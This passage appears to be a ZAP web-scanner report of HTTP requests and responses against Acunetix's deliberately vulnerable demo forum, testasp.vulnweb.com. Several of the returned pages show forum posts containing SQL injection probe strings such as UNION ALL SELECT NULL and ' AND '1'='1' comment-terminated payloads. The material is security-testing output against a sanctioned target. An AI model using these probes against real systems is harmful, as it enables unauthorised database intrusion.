<!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious 